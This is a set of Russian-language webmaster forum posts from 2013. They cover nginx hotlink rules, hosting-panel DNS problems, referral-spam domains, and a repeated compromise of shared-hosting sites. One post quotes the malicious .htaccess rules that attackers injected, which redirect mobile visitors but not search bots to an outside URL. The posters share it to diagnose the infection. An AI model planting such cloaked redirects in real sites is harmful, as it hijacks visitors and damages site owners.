location ~ \.(css)$ { valid_referers none blocked mysite.com *.mysite.com; if ($invalid_referer) { return 403; } }
на сервере хостятся с десяток доменов, мне достаточно туда прописать только один домен с которого тырят ? или необходимо прописывать все домены ?---------- Добавлено 08.06.2013 в 20:36 ----------в конфиге nginx
server { server_name домен www.домен.org; listen ИП домена; set $root_path /var/www/домен/data/www/домен.org; location ~* ^.+\.(jpg|jpeg|gif|png|svg|js|css|mp3|ogg|mpe?g|avi|zip|gz|bz2?|rar|swf)$ { root $root_path; access_log /var/www/nginx-logs/домен isp; access_log /var/www/httpd-logs/домен.org.access.log ; error_page 404 = @fallback;
если я удалю из этой записи "css" для моего домена, правила из htaccess заработают ?
Нашел 2 строчки с указанием внешних НС в файле конфига самого ISP когда сравнивал два бекапа (до и после вмешательства саппорта).
Если пытаться залогинится по указанным имени и паролю в DNSmanager хостера - то выдает неправильный пароль...
В общем временно снес эти две строки в NS и домены начали нормально добавляться. В понедельник буду с саппортом ругаться.
всем спасибо за ответы, действительно я как-то проморгал эти топике на серче.
В настоящее время уже многие начали забивать на Гугл и работать исключительно под Яшу. А если у клиента в Яше все в топе, а вот Гошу постоянно чудит с выдачей...
та же хрень была дописана 6 мая, отписался по возможным вариантом решения и о хостинге. У вас шаред пакет ?
проблема не у вас на сайтах, а у конечных пользователей, так как трафик сливается по давно отработанной системе, которую тестили еще в феврале/марте.
Тогда была аналогичная ситуация, только трафик сливался на 3-5 доменов с пустыми белыми страницами, на которых был только счетчик LI.
Смысл этой затеи был в следующем, пользователям ставились различные тулбары для браузеров, которые и стучали на указанные домены каждые 5-30 сек. Авторы тулюбаров таким образом отслеживали количество активных, среднее время в сети и тд.
Похоже кто-то решил аналогичным образом пустить трафик на раскрутку этого магазина.
PS если нужны будут списки доменов, куда лили раньше могу покопаться и найти, их 3-5 штук было. ---------- Добавлено 21.04.2013 в 04:55 ---------- ну и для того, что бы не быть голословным можете проверить трафик на своих сайтах на предмет сливов:
vkicq.ru 5 апреля
rurna.ru 30 марта
lucur.ru 29 марта
smmhit.ru 28 марта
clovla.ru 22 марта
dekounts.ru и тд
чем больше посещений на сайте тем больше вероятности увидеть эти домены в стате LI ... даная хрень в основном наблюдается в РУ сегменте... ---------- Добавлено 21.04.2013 в 05:30 ---------- подскажите лучше по поводу дле, так как морочу голову с этой фигней с 19 марта, скрипт дописывает по датам
19 марта, 23 марта, 27 марта, 4 и 12 апреля...
в апреле кроме дописывания кода в .htaccess
начали еще пихать 2 вида скрипта в php файлы:
проблема заключается в том, что пишут на два отдельных пакета хостинга (у одного хостера), при этом на одном пакете висит единственный сайт на kohana. На другом пакете дописывают в 1 DLE и 1 самописный. хотя на втором висят еще 4 сайта (3 на дле) и их не трогают.
ставил уже на .htaccess и 444 - все равно перезаписывают.
Первый раз на 3 сайтах нашел шелы, удалил, хостер даже расшифровал один из них. Но "дописи" продолжаются. Еще одна особенность заключается в том, что на хостинге стоит панель ISP и в ней, если редактивать файлы через файл менеджер в корне папки хостинга автоматом создается/меняется файл codepage. Так вот даты изменения этого файла строго совпадают с датой "дописывания".
Хостер включал 12 апреля логирование и сообщил, что дописывание происходит из ISP панели, типа смените основной пароль (я их не сохраняю в браузерах, и с 19 марта уже сменил раза 3). Единственное порекомендовали привязать IP входа в ISP.
Пообщался с рефами на хостинге, у них таже хрень в то же время была дописана. Соответственно ломают через какую-то дырку в панели самого хостера :(
если кому нужен на анлиз сам шел могу скинуть в шифрованном и нешифрованном виде.
тут похоже никто подсказать не может...
а дописывали не этот код:
RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://online56.net/s/11668 [L,R=302]
?
скорее всего centos ... после первой перезаписи 19 марта я сам лично нашел IP того, кто обращался к шелам и выдал их хостеру... тогда хостер сказал что все проверил на сервере и проблема только у меня, мол разбирайтесь со своими дырявыми сайтами сами....
но пообщавшись со своим рефом, который так же висит на этом же сервере выяснилось, что и ему 19 марта дописали вредоносный код по сливу мобильного трафика, он обновил движки и 27 марта ему снова дописали ту же заразу... так что очень похоже, что хостер что-то знает, но молчит....
возможно это оно....
Вечером отписался один из моих рефов, которые висят на том же шаред сервере, у него также перезаписаны файлы .htaccess в корне доменов с разницей в 10 минут от моих.